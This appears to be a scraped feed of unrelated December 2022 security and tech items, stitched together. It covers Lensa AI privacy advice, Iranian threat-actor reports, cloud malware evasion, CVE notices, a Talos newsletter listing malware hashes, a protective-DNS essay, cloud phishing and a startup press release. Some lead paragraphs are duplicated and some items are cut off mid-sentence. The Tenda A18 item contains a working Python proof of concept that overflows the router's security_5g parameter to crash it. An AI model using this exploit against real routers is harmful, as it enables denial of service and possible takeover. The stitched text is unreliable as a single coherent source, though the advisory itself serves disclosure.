Are you thinking about uploading some selfies and buying a pack of ‘Magic Avatars’? Consider these expert tips first.

Has the stale selfie that’s served as your profile picture gone a little _too_ long without a refresh? You’ve likely seen friends using the Lensa AI app to create colorful, custom cartoon images of themselves as ethereal fairies or stern astronauts. Prisma Labs, the company behind Lensa, went viral back in 2016 with a similar (albeit less powerful) app that turned smartphone pics into paintings.

The release of Lensa’s “magic avatars” feature is a global hit for the company. Recent advancements in generative artificial intelligence allow the app to produce more impressive and varied results than its predecessor. According to preliminary estimates provided by Sensor Tower, over 4 million people worldwide downloaded the app during the first five days of December. In that same time period, users spent over $8 million in the app.

AI-generated profile pictures have always raised questions about digital privacy, however. If you’re curious whether it’s a good idea to use Lensa, here’s what you should consider before spending money and uploading your selfies.

Always Read the Privacy Policy

Before diving in, take a minute to browse through the privacy policy and the terms of use to get a better understanding of what the app does with your data. “We always have to be aware when our biometric data is being used for any purpose. This is sensitive data. We should be extra cautious with how that data is being used,” says David Leslie, a director of ethics and responsible innovation research at The Alan Turing Institute and professor at the Queen Mary University of London.

Andrey Usoltsev, the CEO and cofounder of Prisma Labs, claimed the company is working to update the privacy policy in an email to WIRED. “Lensa uses a copy of the Stable Diffusion model and teaches it to recognize the face on the uploaded images in each particular case. This means there is a separate model for each individual user,” writes Usoltsev. “The user’s photos are deleted from our servers as soon as the avatars are generated. The servers are located in the US.”

Although it’s impossible to know exactly how a company is using and storing your data without an independent assessment, this statement is a move in the right direction. With that in mind, however, uploads are only a small part of the larger equation.

The Security Implications Beyond Your Uploaded Pics

While biometrics might be your initial concern, it’s also crucial to understand just how much additional data is automatically collected from your smartphone. Lensa may use third-party analytics, log file information, device identifiers, and registered user information to gather data on you. Go to section 3 of the privacy policy to check it out in detail. 

Any user can opt out of that data collection by contacting the company at privacy@lensa-ai.com. If you use an iOS device, you have the option to opt out by going into your privacy settings. To be fair, it’s not just Lensa: Every app on your phone is probably collecting more data than you realize. Even if you decide to trust Lensa with your personal data, it’s quite possible for the data to change hands if the company is acquired in the future. “That especially happens when it goes into bigger companies that are much more adept at bullshitting around how they talk about it,” says Ben Winters, a lead on the AI and human rights projects at the Electronic Privacy Information Center.

Don’t Import Pictures of Children or Nudity

It goes against the terms of use to insert images of children or nudity to generate images on Lensa. But even if you don’t input nudes, women may receive hypersexual results; “the app not only generates nudes but also ascribes cartoonishly sexualized features, like sultry poses and gigantic breasts, to their images. I, for example, received several fully nude results despite uploading only headshots,” writes WIRED contributor Olivia Snow. The app generated disturbing imagery when Snow uploaded her childhood photos, changing what would have been stylized mementos into dehumanizing imagery. “Since the feature is not designed for minors, we advise against using any images of children,” writes Usoltsev.

Lensa can also produce sexual images of adults without their consent. “It’s a potential instance where insufficient forethought has been put into protecting the dignity of individuals,” says Leslie. “When technologies can harm, we’re on the hook to do all that we can to anticipate those impacts.”

Be Prepared for Odd or Offensive Results

It’s not just funky fingers and second heads, you may also receive results that are racist or sexist when you interact with generative AI. “The internet is filled with a lot of images that will push AI image generators toward topics that might not be the most comfortable, whether it’s sexually explicit images or images that might shift people’s AI portraits toward racial caricatures,” says Grant Fergusson, an Equal Justice Works fellow at EPIC. 

Consider the Larger Impact for Real Artists

Some artists are embracing the potential for generative AI to produce fascinating results. Others are much more hesitant about the technology’s potential repercussions. “The commercialization of these image generators will have an impact on the ability for artists to keep sort of sustaining themselves in the long term,” says Leslie. 

Although it’s a more expensive route, those who are able to should consider commissioning smaller artists to create digital pieces for their new profile picture, phone wallpaper, or portrait. Instagram and Twitter are full of artists who work in a variety of styles that you could never get from generative AI, and many of them are eager for commissions. For a nominal fee, you can get something truly unique and personal. You could even ask around at your community art center and support a local artist.

Try Deleting the App Afterward

Let’s say you’ve considered everything above and still decided to spend a couple of bucks to get a pack of “magic avatars.” After you’ve saved the colorful creations, check out the photo- and video-editing capabilities on Lensa. Is this something you want to use often or is it just another app that’ll collect digital dust on your smartphone? “Control the settings, delete after use, and exercise any and all rights that they offer you,” recommends Winters to anyone worried about data collection.

Lensa AI and ‘Magic Avatars’: What to Know Before Using the App

The subgroup of an Iranian nation-state group known as Nemesis Kitten has been attributed as behind a previously undocumented custom malware dubbed Drokbk that uses GitHub as a dead drop resolver to exfiltrate data from an infected computer, or to receive commands.
"The use of GitHub as a virtual dead drop helps the malware blend in," Secureworks principal researcher Rafe Pilling said. "All the

The subgroup of an Iranian nation-state group known as **Nemesis Kitten** has been attributed as behind a previously undocumented custom malware dubbed **Drokbk** that uses GitHub as a dead drop resolver to exfiltrate data from an infected computer, or to receive commands.

"The use of GitHub as a virtual dead drop helps the malware blend in," Secureworks principal researcher Rafe Pilling said. "All the traffic to GitHub is encrypted, meaning defensive technologies can't see what is being passed back and forth. And because GitHub is a legitimate service, it raises fewer questions."

The Iranian government-sponsored actor's malicious activities came under the radar earlier in February 2022, when it was observed exploiting Log4Shell flaws in unpatched VMware Horizon servers to deploy ransomware.

Nemesis Kitten is tracked by the larger cybersecurity community under various monikers such as TunnelVision, Cobalt Mirage, and UNC2448. It's also a sub-cluster of the Phosphorus group, with Microsoft giving it the designation DEV-0270.

It is also said to share tactical overlaps with another adversarial collective dubbed Cobalt Illusion (aka APT42), a Phosphorus subgroup that's "tasked with conducting information collection and surveillance operations against individuals and organizations of strategic interest to the Iranian government."

Subsequent investigations into the adversary's operations have uncovered two distinct intrusion sets: Cluster A, which employs BitLocker and DiskCryptor to conduct opportunistic ransomware attacks for financial gain, and Cluster B, which carries out targeted break-ins for intelligence gathering.

Microsoft, Google Mandiant, and Secureworks have since unearthed evidence tracing Cobalt Mirage's origins to two Iranian front companies Najee Technology and Afkar System that, according to the U.S. Treasury Department, are affiliated with the Islamic Revolutionary Guard Corps (IRGC).

Drokbk, the newly identified malware, is associated with Cluster B and is written in .NET. Deployed post-exploitation as a form of establishing persistence, it consists of a dropper and a payload that's used to execute commands received from a remote server.

"Early signs of its use in the wild appeared in a February 2022 intrusion at a U.S. local government network," the cybersecurity company said in a report shared with The Hacker News.

This attack entailed the compromise of a VMware Horizon server using the Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046), ultimately leading to the delivery of the Drokbk binary by means of a compressed ZIP archive hosted on a file transfer service.

As a detection evasion measure, Drokbk uses a technique called dead drop resolver to determine its command-and-control (C2) server. Dead drop resolver refers to the use of a legitimate external Web service to host information that points to additional C2 infrastructure.

In this instance, this is achieved by leveraging an actor-controlled GitHub repository that hosts the information within the README.md file.

"Drokbk provides the threat actors with arbitrary remote access and an additional foothold alongside tunneling tools like Fast Reverse Proxy (FRP) and Ngrok," Pilling said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New Drokbk Malware that Uses GitHub as a Dead Drop Resolver

The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity.
"The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up.

Threat Intelligence / Cyber Attack

The Iran-linked **MuddyWater** threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity.

"The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up.

MuddyWater, also called Boggy Serpens, Cobalt Ulster, Earth Vetala, Mercury, Seedworm, Static Kitten, and TEMP.Zagros, is said to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).

Active since at least 2017, attacks mounted by the espionage group have typically targeted telecommunications, government, defense, and oil sectors.

The current intrusion set follows MuddyWater's long-running modus operandi of using phishing lures that contain direct Dropbox links or document attachments with an embedded URL pointing to a ZIP archive file.

It's worth mentioning here that the messages are sent from already compromised corporate email accounts, which are being offered for sale on the darknet by webmail shops like Xleet, Odin, Xmina, and Lufix anywhere between $8 to $25 per account.

While the archive files have previously harbored installers for legitimate tools like ScreenConnect and RemoteUtilities, the actor was observed switching to Atera Agent in July 2022 in a bid to fly under the radar.

But in a further sign that the campaign is being actively maintained and updated, the attack tactics have been tweaked yet again to deliver a different remote administration tool named Syncro.

The integrated MSP software offers a way to completely control a machine, allowing the adversary to conduct reconnaissance, deploy additional backdoors, and even sell access to other actors.

"A threat actor that has access to a corporate machine via such capabilities has nearly limitless options," Kenin noted.

The findings come as Deep Instinct also uncovered new malware components employed by a Lebanon-based group tracked as Polonium in its attacks aimed exclusively at Israeli entities.

"Polonium is coordinating its operations with multiple tracked actor groups affiliated with Iran's Ministry of Intelligence and Security (MOIS), based on victim overlap and the following common techniques and tooling," Microsoft noted in June 2022.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics

At Black Hat Europe, a security researcher details the main evasion techniques attackers are currently using in the cloud.

BLACK HAT EUROPE 2022 – London - CoinStomp. Watchdog. Denonia.

These cyberattack campaigns are among the most prolific threats today targeting cloud systems — and their ability to evade detection should serve as a cautionary tale of potential threats to come, a security researcher detailed here today.

"Recent cloud-focused malware campaigns have demonstrated that adversary groups have intimate knowledge of cloud technologies and their security mechanisms. And not only that, they are using that to their advantage," said Matt Muir, threat intelligence engineer for Cado Security, who shared details on those three campaigns his team has studied.

While the three attack campaigns are all about cryptomining at this point, some of their techniques could be used for more nefarious purposes. And for the most part, these and other attacks Muir's team has seen are exploiting misconfigured cloud settings and other mistakes. That for the most part means defending against them lands in the cloud customer camp, according to Muir.

"Realistically for these kinds of attacks, it has more to do with the user than the \[cloud\] service provider," Muir tells Dark Reading. "They are very opportunistic. The majority of attacks we see have more to do with mistakes" by the cloud customer, he said.

Perhaps the most interesting development with these attacks is that they are now targeting serverless computing and containers, he said. "The ease of which cloud resources can be compromised has made the cloud an easy target," he said in his presentation, "Real-World Detection Evasion Techniques in the Cloud."

**DoH, It's a Cryptominer**

Denonia malware targets AWS Lambda serverless environments in the cloud. "We believe it's the first publicly disclosed malware sample to target serverless environments," Muir said. While the campaign itself is about cryptomining, the attackers employ some advanced command and control methods that indicate they're well-studied in cloud technology.

The Denonia attackers employ a protocol that implements DNS over HTTPS (aka DoH), which sends DNS queries over HTTPS to DoH-based resolver servers. That gives the attackers a way to hide within encrypted traffic such that AWS can't view their malicious DNS lookups. "It's not the first malware making use of DoH, but it certainly isn't a common occurrence," Muir said. "This prevents the malware to trigger an alert" with AWS, he said.

The attackers also appeared to have tossed in more diversions to distract or confuse security analysts, thousands of lines of user agent HTTPS request strings.

"At first we thought it was might be a botnet or DDoS ... but in our analysis it was not actually used by malware" and instead was a way to pad the binary in order to evade endpoint detection & response (EDR) tools and malware analysis, he said.

**More Cryptojacking With CoinStomp and Watchdog**

CoinStomp is cloud-native malware targeting cloud security providers in Asia for cryptojacking purposes. Its main _modus operandi_ is timestamp manipulation as an anti-forensics technique, as well as removing system cryptographic policies. It also uses a C2 family based on a dev/tcp reverse shell to blend into cloud systems' Unix environments.

Watchdog, meanwhile, has been around since 2019 and is one of the more prominent cloud-focused threat groups, Muir noted. "They are opportunistic in exploiting cloud misconfiguration, \[detecting those mistakes\] by mass scanning."

The attackers also rely on old-school steganography to evade detection, hiding their malware behind image files.

"We're at an interesting point in cloud malware research," Muir concluded. "Campaigns still are lacking somewhat in technicality, which is good news for defenders."

But there's more to come. "Threat actors are becoming more sophisticated" and likely will move from cryptomining to more damaging attacks, according to Muir.

3 Ways Attackers Bypass Cloud Security

Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.

CVE-2022-38765: Canon Medical Software Security Updates

Welcome to this week’s edition of the Threat Source newsletter.
As we hurtle toward the end of another year I get that tightness in my chest – that feeling that I think most, if not all, Threat Source readers get at this time of year. That's

Thursday, December 8, 2022 16:12

Welcome to this week’s edition of the Threat Source newsletter.

As we hurtle toward the end of another year I get that tightness in my chest – that feeling that I think most, if not all, Threat Source readers get at this time of year. That's right, it’s once again the time of year when no matter what your current role or area of expertise you become tech support for your entire family and anyone they’ve ever met. They will give you unsolvable tech problems and expect holiday miracles. I have no particularly stellar advice that will help you. I have no words of wisdom that will keep you from your pain. I have only this – you aren’t alone. Make sure to take copious notes so that you can regale your workplace associates with the highlights and kick off the new year by putting that pain behind you.

Stay tuned next week for our inaugural Year in Review report!

**The one big thing**

Cisco Talos Incident Response shared a white paper on the steps organizations should follow to secure any major event. Outlining ten major event preparation focus areas, for each of the ten identified areas, Talos IR provides a short checklist to ensure that different organizations and committees can ask the right questions to vendors, suppliers and other event participants. Although the checklist can serve as a useful starting point for most of our readers, the complexity of the problem and diverse security requirements will likely require an in-depth analysis to identify all risk avenues.

**Why do I care?**

Cisco Talos IR has successfully participated in a number of global events at both the forefront as well as in supporting roles, to ensure that threats are contained before causing major disruption. This white paper leverages that experience to provide the reader with insight into the challenges, critical aspects and methodologies that can be utilized to achieve a strong sense of cyber security and IR readiness at both strategic and tactical levels.

**So now what?**

Ensure that the proper teams read the white paper, follow the blueprint, and are prepared to handle several types of attacks before, during and after the event. Leverage the ten focus areas to help your organization build appropriate security strategies ahead of major events.

**Top security headlines of the week**

Many endpoint detection and response (EDR) technologies may have a vulnerability in them that gives attackers a way to manipulate the products into erasing any data on installed systems. Or Yair, a security researcher at SafeBreach discovered the issue, Security products, such as EDR tools have super-user rights on systems, which could allow an attacker to wipe almost any file on the system, including system files. Yair disclosed the issue at the Black Hat Europe conference on Wednesday, Dec 7 having notified the vendors between July and August. Vulnerable products included Microsoft Windows Defender, Windows Defender for Endpoint, TrendMicro ApexOne, Avast Antivirus, AVG Antivirus, and SentinelOne. (Darkreading)

Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage. Rackspace tweeted "Since becoming aware of suspicious activity in our Hosted Exchange environment on 12/2, we’ve determined that the isolated disruption is the result of ransomware and our security team is working with a lead cyber defense firm to investigate." The cloud service provider says it will notify customers if it finds evidence that the attackers gained access to their sensitive information.(Bleepingcomputer)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/vulnerability-spotlight-memory-corruption-vulnerability-discovered-in-poweriso/
*   https://blog.talosintelligence.com/vulnerability-spotlight-nvidia-driver-memory-corruption-vulnerabilities-discovered/
*   https://blog.talosintelligence.com/vulnerability-spotlight-callback-technologies-cbfs-filter-denial-of-service-vulnerabilities/
*   https://blog.talosintelligence.com/vulnerability-spotlight-lansweeper-directory-traversal-and-cross-site-scripting-vulnerabilities/

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

Threat Source newsletter (Dec. 8, 2022): Your uncle clicked every link

To be most effective, protective DNS services need to constantly reassess and rescore domains as additional data comes in.

**Question: What is the importance of a domain score when determining whether a domain is a threat?**

**Dave Mitchell, CTO, Hyas:** Did you know over 93% of all malware employs DNS as a mechanism to identify and contact its command and control (C2) to receive instructions? This is why a truly holistic cybersecurity strategy must include protection from malicious domains.

Being able to properly assess the reputation and safety of a particular domain is critical to preventing breaches. However, these results are often presented in terms of a threat scoring system, which can misleadingly imply static results. To be most effective, solutions in this space need to constantly reassess and rescore domains as additional data comes in. Legacy approaches to protective DNS fail to adapt to the inherently dynamic nature of the Internet. A proactive system must score potential threats in real time, categorizing the DNS traffic based on both static and dynamic indicators of malicious intent.

First, there are the known bad domains. These are domains that have been publicly reported and confirmed to be malicious. Blocking these domains is critical, but it is only a reactive measure. If your organization gets hit during the first wave of an attack that utilizes new malware or a new exploit, these static lists will not help. Using public block lists also leaves you open to attacks from known threats utilizing different infrastructure. Publicly known malicious domains are usually subject to the strictest layer of protection, and communication with them is forbidden. Someone would have to have a very good reason to access one of these domains.

More proactive scoring methods rely on assigning a threat category to all queried domains based on a wide variety of indicators. This is a huge advantage over the static approach, as detecting a threat in its early stages can give administrators the invaluable time they need to block domains involved with the attack before it is executed — thereby rendering it inert. For a solution to do this effectively, it requires advanced threat intelligence capabilities and an intimate understanding of attacker infrastructure and methodology to know how domains are being used and by whom.

Based on this information, advanced protective DNS services monitor domain traffic for suspicious indicators. For example, if a domain is brand new, bought from an unscrupulous registrar, purchased by a buyer from an area associated with cybercrime, and paid for in cryptocurrency, it's probably smart to block it — even if that domain hasn't been used in an attack yet. The number and severity of the suspicious indicators it finds will determine how the system classifies the domain. Sometimes the indicators are low-priority enough to permit communication with the domain, while still getting marked for further analysis. If the domain is later determined to be malicious, further communication will be blocked. Every service provider has its own secret sauce when it comes to scoring domains, so do your homework and demo a number of services before settling on one.

The more high-quality data a service has access to, the more accurate its results are likely to be when combined with continuous analysis. This is key for generating meaningful scores that maintain the delicate balance between overly aggressive blocking — annoying users and potentially slowing down the pace of business — or even worse, mistakenly letting malicious communication through, defeating the purpose of implementing the protection in the first place.

Beyond these built-in protections, administrators can usually set up custom lists or policies that make the system alert them and/or outright block DNS requests if a domain has multiple negative traits that meet or exceed established parameters. Once alerted, administrators can investigate the incident and proactively deal with it before it causes damage. An advanced protective DNS service also gives you a level of control in enforcing policies, as you can preemptively block certain DNS communications — for example, instituting a blanket block on certain hacker hotbeds. If clean traffic gets caught up in these custom rules, it is easy enough to add domains to the solution's allow list.

Every provider approaches the overall process of scoring domains differently — quite radically in some cases. Bare-minimum (sometimes free) protective DNS services often rely on static, publicly available lists, while more sophisticated services incorporate data from premium intelligence services to stay a bit more current. But the top options use advanced threat intelligence, based on examination of prior attacks and dynamic analysis, to predict domain risk. With the first two types, you are operating from a reactive stance and will almost certainly fall victim to an attack at some point. However, an advanced protective DNS helps secure your assets from new and emerging threats, giving your enterprise the upper hand against threat actors.

How Do I Use the Domain Score to Determine Whether a Domain Is a Threat?

Phishing has long been one of the best ways to gain access to a target organization. It didn't used to be this way. In the early days of computer security, the remote code exploit (RCE) was the preferred method of gaining access, as it required no user interaction. In fact, if something required user interaction, it wasn't considered a serious threat. Better security practices started to take hold, and the RCE method of access became much more challenging. And it turned out, getting users to interact was easier than ever imagined.

The same cycle has started to repeat itself with on-premises targets. Organizations have started to make advances in securing their internal networks against using endpoint detection and response (EDR), and other technologies are better equipped to detect malware and lateral movement. While attacks are becoming more difficult, it's by no means an ineffective strategy for an attacker yet. Deploying ransomware and other forms of malware is still a common outcome.

**Why Your Cloud Infrastructure Is a Top Target for Phishing Attacks**

The cloud has given phishers a whole new frontier to attack, and it turns out it can be very dangerous. SaaS environments are ripe targets for phishing attacks and can give the attacker a lot more than access to some emails. Security tools are still maturing in this environment, which offers attackers a window of opportunity where methods such as phishing attacks can be very effective.

**Phishing Attacks Targeting Developers and Software Supply Chain**

As we saw recently, Dropbox had an incident due to a phishing attack against its developers. They were tricked into giving their Github credentials to an attacker by a phishing email and fake website, despite multifactor authentication (MFA). What makes this scary is that this wasn't just a random user from sales or another business function, it was developers with access to a lot of Dropbox data. Thankfully, the scope of the incident doesn't appear to affect Dropbox's most critical data.

GitHub, and other platforms in the continuous integration/continuous deployment (CI/CD) space, are the new "crown jewels" for many companies. With the right access, attackers can steal intellectual property, leak source code and other data, or conduct supply chain attacks. It goes even farther, as GitHub often integrates with other platforms, which the attacker may be able to pivot. All of this can happen without ever touching the victim's on-prem network, or many of the other security tools that organizations have acquired, since it is all software-as-a-service (SaaS)-to-SaaS.

Security in this scenario can be a challenge. Every SaaS provider does it differently. A customer's visibility into what happens in these platforms is often limited. GitHub, for example, only gives access to its Audit Log API under its Enterprise plan. Getting visibility is only the first hurdle to overcome, the next would be to make useful detection content around it. SaaS providers can be quite different in what they do and the data that they provide. Contextual understanding of how they work will be required to make and maintain the detections. Your organization may have many such SaaS platforms in use.

**How Do You Mitigate Risks Associated With Phishing in the Cloud?**

Identity platforms, such as Okta, can help mitigate the risk, but not completely. Identifying unauthorized logins is certainly one of the best ways to discover phishing attacks and respond to them. This is easier said than done, as attackers have caught on to the common ways of detecting their presence. Proxy servers or VPNs are easily used to at least appear to come from the same general area as the user in order to defeat country or impossible travel detections. More advanced machine learning models can be applied, but these are not yet widely adopted or proven.

Traditional threat detection is starting to adapt to the SaaS world as well. Falco, a popular threat detection tool for containers and cloud, has a plug-in system that can support nearly any platform. The Falco team has already released plug-ins and rules for Okta and GitHub, among others. For example, the GitHub plug-in has a rule that triggers if any commits show signs of a crypto miner. Levering these purpose-built detections is a good way to get started in bringing these platforms into your overall threat detection program.

**Phishing Is Here to Stay**

Phishing, and social engineering in general, will never be left behind. It has been an effective attack method for years, and will be for as long as people communicate. It is critical to understand that these attacks are not limited to the infrastructure you own or manage directly. SaaS is especially at risk due to the lack of visibility most organizations have to what actually happens on those platforms. Their security cannot be written off as someone else's problem, as a simple email and fake website is all it takes to get access to those resources.

Phishing in the Cloud: We're Gonna Need a Bigger Boat

Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Startup raises $8.5 million in seed funding led by Ten Eleven Ventures.

**CHARLESTON, S.C., Dec. 8, 2022 /PRNewswire/ —** Interpres Security, a company dedicated to helping companies optimize their security performance with a comprehensive new approach to managing the defense surface, announced its emergence from stealth alongside $8.5M in seed financing led by Ten Eleven Ventures. The Interpres Security platform offers a customized, continuous, and threat-informed analysis of an organization's detection and mitigation capabilities and provides automated security engineering directives based on this evaluation, ultimately enabling a hardened security posture in the most efficient manner possible.

To address the expanding number of cybersecurity threats, organizations now use an average of 76 tools in their security stack. Despite this level of investment, organizations still do not know how effective this tooling is against their specific and expanding threat profile. Without a clear picture of the most relevant threats or how well their current tools work against them, organizations do not have a complete view of how well-defended they are.

After experiencing a systems breach firsthand at a classified security operations center, members of the Interpres Security founding team developed a new Threat Centric Methodology to validate the effectiveness of all of the security vendors in the environment. This approach proved successful, and later the same methodology became the genesis for Interpres Security's automation of these capabilities into their new platform.

Interpres Security currently integrates the MITRE ATT&CK framework to prioritize threat coverage based on the adversaries most likely to target an organization, the malware and techniques those adversaries use, and the prevalence of those attacks as seen in the wild. It then recommends mitigations, telemetry collection strategies, and detection logic best suited to fill the prioritized gaps in coverage across the enterprise to detect and mitigate threats most likely to target the organization. It does all this while utilizing the organization's existing investment in cybersecurity products and solutions. Once the defense ecosystem is optimized, Interpres maintains this state through a situational awareness dashboard that detects drift in configuration and changes to risk posture while offering detailed board-level reporting.

"Until now, only large security engineering teams have even been able to attempt to analyze, validate, and optimize an organization's specific security toolset and processes. However, the detailed analysis and threat intelligence needed is extremely time-consuming and manually intensive to complete. The capabilities that we have automated within the Interpres platform goes beyond the scope of what humans can complete regularly, in real-time," said Nick Lantuh, Chief Executive Officer and Co-Founder at Interpres Security and former Founder and President of NetWitness (acquired by EMC in 2011). "It's time for a new approach. Automation and threat-informed prioritization are necessary to properly assess, configure, optimize and align current security tools to optimally defend against advanced threats in a timely manner. That's the value of the Interpres platform."

"We see CISOs regularly struggle to get a handle on which security tools are most effective for their organization's specific needs," said Mark Hatfield, General Partner at Ten Eleven Ventures and new board member at Interpres Security. "They want to hold the vendors accountable for what they've promised - to understand how well their tools stand up to threats they are most likely to face. The exceptional team at Interpres Security has developed a platform that does exactly that - help companies 'shrink the stack', get the most out of their existing cybersecurity investments, understand where they are and are not protected, rationalize product investments and harden their defenses."

**About Interpres Security**

Interpres Security makes security performance intelligible and provable for the enterprise with a comprehensive new approach to managing the defense surface. With Interpres, security teams can take a threat-informed perspective to understand what their current tools can detect and defend against, identify gaps and inefficiencies, and iteratively improve their security posture with a data-driven and custom tailored approach. Interpres Security is backed by top cybersecurity specialist investor, Ten Eleven Ventures. To learn more and request a demonstration of the platform, visit their website at InterpresSecurity.com and follow the company on LinkedIn or Twitter.

**About Ten Eleven Ventures**

Ten Eleven Ventures is the original cybersecurity-focused, global, stage agnostic investment firm. The firm finds, invests, and helps grow top cybersecurity companies addressing critical digital security needs, tapping its team, network, and experience to help build successful businesses. Since its founding, Ten Eleven Ventures has raised over $US 1 billion and made over 40 cybersecurity investments across stages worldwide, including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.

Tag

#intel